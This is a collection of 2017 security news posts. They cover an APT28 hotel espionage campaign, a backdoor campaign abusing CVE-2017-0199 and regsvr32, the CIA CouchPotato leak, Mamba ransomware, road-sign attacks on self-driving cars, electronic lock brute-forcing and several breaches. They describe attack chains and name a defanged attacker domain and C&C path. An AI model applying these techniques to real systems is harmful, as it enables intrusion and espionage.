Saturday, August 12, 2017

APT28 hackers are leveraging NSA Hacking tool to spy on Hotels guests

According to FireEye, the notorious Russia-linked APT28 group (Pawn Storm, Fancy Bear, Sofacy, Sednit and Strontium) is behind an ongoing campaign targeting hotels in several European countries.
The researchers observed many attacks targeting the networks of hotels to gain access the devices of government and business travelers via the guest Wi-Fi.
The hackers targeted several companies in the hospitality sector, including hotels in seven European countries and at least one in the Middle Eastern country.
The attack chain starts with a spear phishing email sent to a hotel employee, the messages use weaponized document named “Hotel_Reservation_Form.doc.” The embedded macros decode a dropper that delivers the GameFish malware. Experts noticed that the backdoor is the same used by the APT28 in a recent campaign that targeted Montenegro after the state officially joined NATO alliance despite the strong opposition from Russian Government that threatened to retaliate.
Once the hackers accessed the target network, they used the NSA-linked EternalBlue SMB exploit for lateral movements. According to the malware researchers at FireEye, this is the first time APT28 hackers had used this NSA exploit.
“APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers. Once inside the network of a hospitality company, APT28 sought out machines that controlled both guest and internal Wi-Fi networks. No guest credentials were observed being stolen at the compromised hotels; however, in a separate incident that occurred in Fall 2016, APT28 gained initial access to a victim’s network via credentials likely stolen from a hotel Wi-Fi network.” reads the analysis published by FireEye.
The APT28 hackers also used the open source penetration testing tool Responder for NetBIOS Name Service (NBT-NS) poisoning.
“Upon gaining access to the machines connected to corporate and guest Wi-Fi networks, APT28 deployed Responder. Responder facilitates NetBIOS Name Service (NBT-NS) poisoning.
This technique listens for NBT-NS (UDP/137) broadcasts from victim computers attempting to connect to network resources. Once received, Responder masquerades as the sought-out resource and causes the victim computer to send the username and hashed password to the attacker-controlled machine. APT28 used this technique to steal usernames and hashed passwords that allowed escalation of privileges in the victim network,” continues FireEye.
The researchers reported details about an intrusion occurred in 2016, a user connected to a hotel’s Wi-Fi and 12 hours later APT28 hackers used stolen credentials to access his network and his Outlook Web Access (OWA) account.
This isn’t the first time hackers targeted travelers, the most important case is represented by the DarkHotel APT. The APT group targeted European hotels hosting participants in Iranian nuclear negotiations, and according to some reports, hackers spied on high-profile people visiting Russia and China.
“Cyber espionage activity against the hospitality industry is typically focused on collecting information on or from hotel guests of interest rather than on the hotel industry itself, though actors may also collect information on the hotel as a means of facilitating operations,” FireEye said. “Business and government personnel who are traveling, especially in a foreign country, must often rely on less secure systems to conduct business than at their home office, or may be unfamiliar with the additional threats posed while abroad.”

Malware campaign targets Russian-Speaking companies with a new Backdoor

Security experts at Trend Micro have spotted a new cyber espionage campaign that has been active for at least two months and that is targeting Russian-speaking enterprises delivering a new Windows-based backdoor, Trend Micro warns.
The hackers leverage on many exploits and Windows components to run malicious scripts to avoid detection. The last sample associated with this attack was uploaded to VirusTotal on June 6, 2017 and experts at Trend Micro observed five spam campaigns running from June 23 to July 27, 2017.
Hackers are targeting financial institutions and mining firms with different spear phishing messages.
The phishing messages are designed to appear as if they were sent from sales and billing departments and contain a weaponized Rich Text Format (RTF) file that exploits the CVE-2017-0199 flaw in Microsoft Office’s Windows Object Linking and Embedding (OLE) interface.
Once the exploit code is executed, it downloads a fake Excel XLS file embedded with malicious JavaScript. When opened, the Excel header is ignored and the file is treated as an HTML Application file by the Windows component mshta.exe.
“The exploit code downloads what is supposedly an XLS file from hxxps://wecloud[.]biz/m11[.]xls. This domain, to which all of the URLs used by this attack point to, is controlled by the attacker and was registered in early July.” states the analysis publiahed by Trend Micro.
“This fake Excel spreadsheet file is embedded with malicious JavaScript. The Excel header will actually be ignored and the file will be treated as an HTML Application file by mshta.exe, the Windows component that handles/opens HTA or HTML files.”
The JavaScript code calls the odbcconf.exe normal executable to run the DLL. Once executed, the DLL drops a SCT file (Windows scriptlet) in the %APPDATA% folder and appends the .TXT extension to it.
The DLL calls is used to power a Squiblydoo attack that leverages the Regsvr32 (Microsoft Register Server) to bypass restrictions on running scripts and evade application whitelisting protections such as AppLocker.
“This particular command uses the Regsvr32 (Microsoft Register Server) command-line utility, which is normally used to register and unregister OLE controls in the Windows registry, including DLL files. This attack method is also known as Squiblydoo—Regsvr32 is abused to bypass restrictions on running scripts.” continues the analysis. “It also means evading application whitelisting protections such as AppLocker. While Squiblydoo is already a known attack vector, this is the first time we’ve seen it combined with odbcconf.exe.”
In May, experts at FireEye spotted a new APT group that was targeting Vietnamese interests around the globe, the hackers leveraged the Squiblydoo technique to enable the download of a backdoor from APT32 infrastructure.
Next, the real backdoor is downloaded and executed, it is an XML file that is downloaded from the domain wecloud[.]biz. Also in this case, it is executed exploiting the same Regsvr32-abusing Squiblydoo attack technique.
“This is another SCT file with obfuscated JavaScript code that contains backdoor commands, which essentially allow attackers to take over an infected system. It attempts to connect to its C&C server at hxxps://wecloud[.]biz/mail/ajax[.]php and retrieve tasks to carry out, some of which are:
  • d&exec = download and execute PE file
  • gtfo = delete files/startup entries and terminate
  • more_eggs = download additional/new scripts
  • more_onion = run new script and terminate current script
  • more_power = run command shell commands
” reads the analysis.
Experts noticed that even if the attack chain appears complex, it starts leveraging a Microsoft Office exploit. The best defense still consists in patching and keeping software up-to-date.

Mysterious company is offering up to $250,000 for VM Hacks through a bug bounty

A mysterious company makes the headlines for offering up to $250,000 for virtual machine (VM) hacks. The “secret” bug bounty program was announced by the crowdsourced security testing platform Bugcrowd.
At the time I was writing the unique information available on the target is that it is an unreleased product.
The program is invitation-only, but anyone can apply for an invite, the organization will contact the final participants.
“Bugcrowd has an exciting opportunity to participate in a private, invite-only program with an undisclosed client, against an unreleased product – with rewards up to $250,000!” reads the announcement published on Bugcrowd. 
Candidates must have specific skills on virtual environments, kernel and device driver security, firmware security, and advanced application security.
VM Hacks via bug bounty
The hackers must focus their activities in:
  • Guest VM breakout/isolation failures
  • Code execution beyond the confines of your guest VM
  • Privilege escalation within the guest VM made possible by the underlying platform
  • Any vulnerabilities which could lead to compromise or leakage of data and directly affect the confidentiality or integrity of user data of which affects user privacy (including memory corruption, cross guest VM issues, persistent issues).
  • Denial/degrading service to other customers, or of the underlying platform itself (excluding DDoS)
Participants can earn between $5,000 and $250,000 for each vulnerability they will report, the duration of the bug bounty program is roughly of 8 weeks, it will start in September.
Bug bounty programs are becoming even more common in the IT security industry, VM hacks are among the issues considered more interesting by the experts. Last year, security experts earned $150,000 for or the hack of the VMware Workstation 12.5.1. reported at the hacking contest 2016 PwnFest held in South Korea at the 2016 Power Of Community (POC) security conference.
This year, during the Pwn2Own contest, the researchers at the Tencent Security’s Team Sniper earned $100,000 for a VMware Workstation exploit that could be exploited by attackers used to escape VMs.

Friday, August 11, 2017

Wikileaks – CIA CouchPotato remote tool can stealthy collect RTSP/H.264 video streams

“Today, August 10th 2017, WikiLeaks publishes the the User Guide for the CoachPotato project of the CIA. CouchPotato is a remote tool for collection against RTSP/H.264 video streams. It provides the ability to collect either the stream as a video file (AVI) or capture still images (JPG) of frames from the stream that are of significant change from a previously captured frame. It utilizes ffmpeg for video and image encoding and decoding as well as RTSP connectivity. CouchPotato relies on being launched in an ICE v3 Fire and Collect compatible loader.” states Wikipedia.
The document leaked from the CIA details how the tool could be used by cyber spies to remotely capture RTSP/H.264 video streams.
The Real Time Streaming Protocol ( RTSP), is a network control protocol designed for controlling streaming media servers.
“CouchPotato is a remote tool for collection against RTSP/H.264 video streams. It provides the ability to collect either the stream as a video file (AVI) or capture still images (JPG) of frames from the stream that are of significant change from a previously captured frame. CouchPotato utilizes ffmpeg for video and image encoding and decoding as well as RTSP connectivity.” reads the user guide. “In order to minimize size of the DLL binary, many of the audio and video codecs along with other unnecessary features have been removed from the version of ffmpeg that CouchPotato is built with. pHash, an image hashing algorithm, has been incorporated into ffmpeg’s image2 demuxer to provide image change detection capabilities. CouchPotato relies on being launched in an ICE v3 Fire and Collectcompatible loader.” 
The CouchPotato tool utilizes FFmpeg for video and image encoding and decoding and Real Time Streaming Protocol connectivity.
The CouchPotato tool is hard to detect, it supports the file-less ICE v3 “Fire and Collect” loader, which is an in-memory code execution (ICE) technique.
The documents don’t include details on how the CIA operators compromise the target systems. It is likely the CouchPotato tool needs to be used in conjunction with other hacking tools to penetrate the targeted systems.

A Self-driving car can be easily hacked by just putting stickers on road signs

We have discussed car hacking many times, it is a scaring reality and the numerous hacks devised by security experts demonstrated that it is possible to compromise modern connected car.
The latest hack demonstrated by a team of experts is very simple and efficient, a simple sticker attached on a sign board can confuse any self-driving car and potentially lead an accident.
The hack was devised by a group of researchers from the University of Washington that explained that an attacker can print stickers and attach them on a few road signs to deceive “most” autonomous cars into misinterpreting road signs when they are altered by placing stickers or posters.
The sign alterations in the test performed by the researcher were very small, even if they can go unnoticed by humans, the algorithm used by the camera’s software interpreted the road sign in a wrong way.
self-driving car
The problem affects the image recognition system used by most self-driving car cars as explained in a research paper, titled “Robust Physical-World Attacks on Machine Learning Models.
“Given these real world challenges, an attacker should be able to account for the above changes in physical conditions while computing perturbations, in order to successfully physically attack existing road sign classifiers. In our evaluation methodology, we focus on three major components that impact
how a road sign is classified by, say, a self-driving car. ” reads the paper.
The experts demonstrated different tricks to interfere with the mechanisms implemented in modern self-driving cars to read and classify road signs, just using a color printer and a camera.
In the Camouflage Graffiti Attack, the experts added simply stickers with the words “Love” and “Hate” onto a “STOP” sign. The autonomous car’s image-detecting algorithms were not able to distinguish the road signs and interpreted them as Speed Limit 45 sign in 100 percent of test cases.
A similar camouflage was tested on a RIGHT TURN sign and the cars wrongly classified it as a STOP sign in 66 percent of the cases.
The researchers also tried a Camouflage Abstract Art Attack by applying smaller stickers onto a STOP road sign. In this way, the camouflage interferes with the car systems that interpreted the road sign as a street art in 100 percent of the time.
“Our attack reports a 100% success rate for misclassification with 66.67% of the images classified as a Stop sign and 33.7% of the images classified as an Added Lane sign. It is interesting to note that in only 1 of the test cases was the Turn Right in the top two classes.”  reads the paper. “In most other cases, a different warning sign was present. We hypothesize that given the similar appearance of warning signs, small perturbations are sufficient to confuse the classifier. In future work, we plan to explore this hypothesis with targeted classification attacks on other warning signs.”
The experts did not reveal the manufacturer whose self-driving car they used in their tests, anyway their research demonstrates the importance to improve safety and security of such kind of vehicles.

Mamba ransomware is back and targets organizations in Brazil and Saudi Arabia

Mamba ransomware is one of the first malware that encrypted hard drives rather than files that was detected in public attacks.
Mamba leverages a disk-level encryption strategy instead of the conventional file-based one.
A similar Ransomware, called Petya, made the headlines for the recent massive attack and its disk encryption strategy. The first sample of Mamba Ransomware discovered in the wild were using a full disk encryption open source tool called DiskCryptor to strongly encrypt the data.
Mamba mostly targeted organizations in Brazil, it was also used by crooks in the attack against the San Francisco Municipal Transportation Agency occurred in November.
Researchers at Kaspersky Lab discovered a new wave of attack leveraging the Mamba ransomware that hit organizations in Brazil and Saudi Arabia.
Like the NotPetya massive attack, also Mamba appears to have been designed for sabotage, it is unclear if the malware was developed by crooks or by a nation-state actor.
Unlike the NotPetya attacks, it is not excluded that Mamba victims could decrypt their data.
“Authors of wiper malware are not able to decrypt victims’ machines. For example, if you remember the ExPetr [malware], it uses a randomly generated key to encrypt a victim machine, but the trojan doesn’t save the key for further decryption,” said Kaspersky Lab researcher Orkhan Memedov. “So, we have a reason to call it ‘a wiper.’ However, in case of Mamba the key should be passed to the trojan as a command line argument, it means that the criminal knows this key and, in theory, the criminal is able to decrypt the machine.”
Mamba was first spotted on September 2016 when experts at Morphus Labs discovered the infection of machines belonging to an energy company in Brazil with subsidiaries in the United States and India.
The researchers shared a detailed analysis on Security Affairs, they explained that once the malware has infected a Windows machine, it overwrites the existing Master Boot Record, with a custom MBR and encrypts the hard drive using the DiskCryptor tool.
“Unfortunately there is no way to decrypt data that has been encrypted with the DiskCryptor utility, because this legitimate utility uses strong encryption algorithms,” explained Kaspersky Lab.
The last samples of Mamba ransomware show an unusual ransom note that instead of demanding for money like the original Mamba, it provides two email addresses and an ID number to be used to recover the encryption key.
mamba ransomware 2
The threat actor behind the new wave of Mamba ransomware attacks leverages the PSEXEC utility to execute the malware on the corporate network once it has penetrated it. PSEXEC is the same tool used by NotPetya to spread within target networks.
The attack chain described by Kaspersky has two phases, in the first one attackers drop the DiskCryptor tool into a new folder created by the malware. The persistence is obtained by registering a system service called DefragmentService, then the system is rebooted.
The second phase sets up the new bootloader and encrypts disk partitions using DiskCryptor, then the machine is rebooted.
“It is important to mention that for each machine in a victim’s network, the threat actor generates a password for the DiskCryptor utility,” Kaspersky Lab said in its report. “This password is passed via command line arguments to the ransomware dropper.

Cyber criminals demand HBO millions to stop leaking its material

Crooks claiming to have hacked television group HBO networks were demanding millions of dollars in ransom payments from the company while threatening to release more material.
The alleged hackers published a five-minute video letter to HBO chief Richard Plepler claiming to have “obtained valuable information” in a cyber attack. Cyber criminals said they had stolen 1.5 terabytes of data.
The author of the message dubbed himself  “Mr. Smith,” he confirmed his group obtained “highly confidential” documents and data, including scripts, contracts, and personnel files.
According to the website, on Monday hackers leaked 10 files including what appears to be another script of the fantasy series “Game of Thrones.”
Along with the video letter, the hackers released 3.4GB of files. The dump contained technical data related to the HBO’s internal network and administrator passwords, and of course the draft scripts from five Game of Thrones episodes. The huge trove of files also includes a month’s worth of emails from HBO’s vice president for film programming, Leslie Cohen.
The hackers claim a long work to compromise the HBO network, it took six months to break into the company systems, they also added to have purchased $500,000 a year zero-day exploits that let them hack the firm exploiting flaws in Microsoft and other software used by HBO.
hbo Games of Thrones
The crooks pretend to receive half of the HBO group’s annual budget of $12 million to $15 million to stop leasing the files.
“We want XXX dollars to stop leaking your data,” “HBO spends 12 million for Market Research and 5 million for GOT7 advertisements. So consider us another budget for your advertisements!”
The video message comes a few days after a leak of one script of “Games of Thrones” and clips from other series.
The hackers claim HBO was his 17th victim and that “only 3 of our past targets refused to pay and were punished very badly and 2 of them collapsed entirely.”
HBO fears that hackers will leak other material and that “the forensic review is ongoing.”
“While it has been reported that a number of emails have been made public, the review to date has not given us a reason to believe that our email system as a whole has been compromised,” the statement from the Time Warner unit said. “We continue to work around the clock with outside cybersecurity firms and law enforcement to resolve the incident.”

Adobe patches 80 vulnerabilities in its products, including Flash Player, Reader, and Acrobat

Adobe released security updates for its Flash Player, Reader, Acrobat, Digital Editions and Experience Manager products. The company addressed more than 80 vulnerabilities.
Adobe has updated Flash Player to version on all platform, this release addresses only two vulnerabilities, a serious security bypass flaw, tracked as CVE-2017-3085, that can lead to information disclosure and a critical type confusion flaw (CVE-2017-3106) that can lead to remote code execution.
“Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These updates address a critical type confusion vulnerability that could lead to code execution and an important security bypass vulnerability that could lead to information disclosure.” reads the security advisory.
The experts Mateusz Jurczyk and Natalie Silvanovich of Google Project Zero were credited for the code execution vulnerability, while the information disclosure issue was reported by Björn Ruytenberg via ZDI.
Adobe announced end of life for Flash Player by the end of 2020.
69 vulnerabilities were fixed in Reader and Acrobat 2017.009.20058, 2017.008.30051 and 2015.006.30306 and earlier versions on Windows and Mac.
The security updates fix flaws rated Critical and Important that could be exploited by hackers to take control of the affected system.
The list of flaws includes critical memory corruption, use-after-free, heap overflow, and type confusion vulnerabilities, according to Adobe they can be exploited for remote code execution and some of them can lead to information disclosure.
The flaws have been discovered and reported by external independent researchers, many of them via the Trend Micro’s Zero Day Initiative (ZDI), the expert Ke Liu from Tencent’s Xuanwu LAB was credited with the highest number of issues.
Adobe released new versions of Flash Player and Connect web conferencing software to fix important and critical vulnerabilities.
Adobe also patched three moderate and important severity vulnerabilities in the Experience Manager enterprise content management product. The flaw could be exploited by attackers for information disclosure and arbitrary code execution, the vulnerabilities were reported to Adobe anonymously.
“Adobe has released security updates for Adobe Experience Manager. These updates resolve a moderate filetype validation vulnerability (CVE-2017-3108) and two moderate information disclosure vulnerabilities (CVE-2017-3107 and CVE-2017-3110).” reads the advisory.
Adobe addressed 9 vulnerabilities with the latest updates for the Windows, Mac, iOS and Android versions of the Adobe Digital Editions ebook reader that have been reported by Steven Seeley of Source Incite, Jaanus Kääp of Clarified Security, and Riusksk of Tencent.
Two flaws tracked as CVE-2017-11274 and CVE-2017-11272, have been rated as critical, they can trigger code execution and information disclosure.
Adobe is not aware of attacks in the wild exploiting the above issues.

Black Hat 2017 – Hacking the electronic locks to open the doors could be easy

Many times, we have seen in movies hackers and spies breaking electronic locks with any kind of electrical equipment.
A pocket device that in a few seconds is able to try all the possible combination and find the correct one to open the door.
At Black Hat 2017 hacker conference, the expert Colin O’Flynn presented an interesting report on breaking electronic door locks.
O’Flynn focused his analysis on two samples of home electronic locks and he found the first model vulnerable to so-called Evil Maid attacks. The attacker needs the physical access to the lock’s internal component to add their own code to open the door whenever he needs.
The curious thing is that step-by-step instructions on how to add the code are reported right inside the battery compartment.
electronic locks attack
The expert noticed that the systems lack of authentication to enter the code, no user code or master code is requested.
The second model is vulnerable to a different attack from the outside. The outer part of the lock contains a module with a touch-screen for entering a PIN code that can be easily extracted by the attacker with a common knife to access the connector.
O’Flynn analyzed the way the external and internal components the lock interact and devised a device that appears exactly like the one used by hackers in the movie.
After studying how the external and internal parts of the lock interact,
The device could be used to brute-force the combination by directly connecting it to the connector. The attack works because there is no authentication in place to check with component communicates with the connector.
electronic locks hacking
The expert noticed a security measure implemented by the electronic lock manufacturer against brute-force attacks, after more than three incorrect tries the device triggers the alarm.
Nevertheless, O’Flynn discovered that it was possible to reset the counter of the failed-attempts by applying a certain voltage to the external connector’s contacts and causing the system reboot.
O’Flynn created a device that can check toughly 120 codes per minute, trying all possible four-digit PIN combinations for the electronic lock the entire process can take about 85 minutes in the worst case. The experts explained that in most cases, a half-hour to an hour is the time necessary to the hack.
O’Flynn also devised a method to discover the six-digits master code with an improved brute-force attack. Normally to discover a six-digit code it is necessary a week, but the expert noticed that when you enter the first four of six numbers of the master code, the system either shows an error message or waits for the other two numbers to be entered, confirming to the attacker that the first four digits are correct.
This method requires 85 minutes to brute-force the first four numbers of the master code and one minute more for the remaining two numbers. The attacker can then use the master code to reset the access code.
O’Flynn reported the issues to the electronic lock manufacturer, who confirmed that they will be fixed as soon as possible.
Electronic locks are still not totally secure!

Hotspot Shield VPN threatens your privacy by injecting ads and JS into browsers

The digital rights advocacy group Center for Democracy & Technology (CDT) urged US federal trade authorities to investigate VPN provider AnchorFree for deceptive trade practices.
AnchorFree provides the Hotspot Shield VPN app claiming it allows to protect users from online tracking, but, according to a complaint filed with the FTC, the application gathers data and shares it according to its privacy policy.
“The Center for Democracy & Technology asks the Federal Trade Commission
(Commission) to investigate the data security and data sharing practices of Hotspot
Shield Free Virtual Private Network (VPN) services, a product of AnchorFree, Inc.
Hotspot Shield Free VPN promises secure, private, and anonymous access to the internet.” reads the compliant. As detailed below, this complaint concerns undisclosed and unclear data sharing and traffic redirection occurring in Hotspot Shield Free VPN that should be considered unfair and deceptive trade practices under Section 5 of the FTC Act. “
Anchorfree Hotspot Shield
The VPN service injects ads and JavaScript code for advertising purposes into user’s browser when connected through Hotspot Shield exposing them to online monitoring.
“Hotspot Shield tells customers that their privacy and security are ‘guaranteed’ but their actual practices starkly contradict this,” said Michelle De Mooy, Director of CDT’s Privacy & Data Project, in a statement. “They are sharing sensitive information with third party advertisers and exposing users’ data to leaks or outside attacks.”
The experts that analyzed the source code of the application discovered the company is using several tracking libraries, it is very curious considering the company’s motto was “Don’t let ISPs monetize your web history: Use Hotspot Shield,”.
“Contrary to Hotspot Shield’s claims, the VPN has been found to be actively injecting
JavaScript codes using iframes for advertising and tracking purposes. An iframe, or
“inline frame,” is an HTML tag that can be used to embed content from another site or
service onto a webpage; iframes are frequently used to insert advertising, but can also be used to inject other malicious or unwanted code onto a webpage. Further analysis of Hotspot Shield’s reverse-engineered source code revealed that the” continues the compliant.
“VPN uses more than five different third-party tracking libraries, contradicting 34
statements that Hotspot Shield ensures anonymous and private web browsing.”
The CDT claims the VPN application gathers location data to optimize the advertising features, and it collects IP addresses, unique device identifiers, and other information (SSID/BSSID network names, MAC addresses, and device IMEI numbers.).
Although IP address and unique device identifiers are private personal information, the AnchorFree’s Privacy Policy explicitly exempts this data from its definition of Personal Information.
“Importantly, the Privacy Policy makes clear that neither IP addresses nor unique device identifiers are considered to be personal information by Hotspot Shield” states the complaint.
The CDT filing argues AnchorFree collects more data than normally needed to VPN service providers for their operations.

FireEye Provides Update on the alleged data breach revealed late July

Late July, hackers have posted details alleged stolen from a system belonging to Adi Peretz, a Senior Threat Intelligence Analyst at security firm FireEye/Mandiant.
The leaked archive is a 337MB PST file containing the expert’s emails. Leaked archive also includes images of its accounts, including One Drive, Live, LinkedIn, geo-tracking of personal devices for at least a year, billing records and PayPal receipts.
“In addition to that are images detailing the compromise of their One Drive account, Live account, LinkedIn account, geo-tracking of personal devices for at least a year, billing records and PayPal receipts, credentials for an engineering portal at FireEye, WebEx and JIRA portals, as well as Live and Amazon accounts. There are also records related to an alleged customer, Bank Hapoalim, and internal documentation and presentations, including one for the IDF (Israel Defense Forces) from 2016.” reported Salted Hash.
The security firm has denied any intrusion in its systems, while the hackers who published the alleged Mandiant Internal Leaks claimed it was part of the ongoing campaign #OpLeakTheAnalyst.
Today FireEye provides an update on the event following its investigation into allegations made earlier this week that FireEye had been breached. As background, on July 31,
According to the security firm, the hackers did not hack the company network or the Adi Peretz’s personal or corporate computers.
The login credentials used by Peretz were exposed in the past in numerous data breaches, including LinkedIn.
The experts discovered that the attackers started using the stolen credentials to access several of the Victim’s personal online accounts (LinkedIn, Hotmail and OneDrive accounts) in September 2016.
The documents publicly released were obtained from the Victim’s personal online accounts and many of them were already available online.
Below the list of conclusions published by FireEye in a blog post.
  • The Attacker did not breach, compromise or access our corporate network, despite multiple failed attempts to do so.
  • The Attacker did not breach, compromise or access the Victim’s personal or corporate computers, laptops or other devices.
  • We confirmed the Victim’s passwords and/or credentials to his personal social media and email accounts were among those exposed in at least eight publicly disclosed third party breaches (including LinkedIn) dating back to 2016 and earlier.
  • Starting in September 2016, the Attacker used those stolen passwords and/or credentials to access several of the Victim’s personal online accounts, including LinkedIn, Hotmail and OneDrive accounts.
  • The Attacker publicly released three FireEye corporate documents, which he obtained from the Victim’s personal online accounts.
  • All of the other documents released by the Attacker were previously publicly available or were screen captures created by the Attacker.
  • A number of the screen captures created by the Attacker and posted online are misleading, and seem intentionally so. They falsely implied successful access to our corporate network, despite the fact that we identified only failed login attempts from the Attacker.
FireEye highlighted that the Victim supports a small number of customers, only two of them were impacted by the leak.
Below the actions conducted by FireEye:
  • We contacted the two identified customers as soon as we learned of this incident and have kept them apprised of the situation throughout the week.
  • We immediately contained the Victim’s systems.
  • We collected and reviewed forensic data from the Victim’s systems.
  • We disabled the Victim’s FireEye corporate accounts.
  • We worked with the Victim to regain control of his personal online accounts.
  • We worked with the Victim to secure his personal online accounts, including implementing multi-factor authentication where possible.
  • We communicated to all FireEye employees, both verbally and in writing, a reminder to be vigilant and provided detailed steps to best secure their personal accounts.
  • We worked with the Victim and his online third party service providers to obtain any available log data that could assist our investigation.
  • We reviewed all data sent to and from FireEye email to the Victim’s online accounts.
  • We reviewed authentication and access activity on the Victim’s corporate, single sign-on (SSO), multi-factor, and third-party accounts.
The investigation is still ongoing.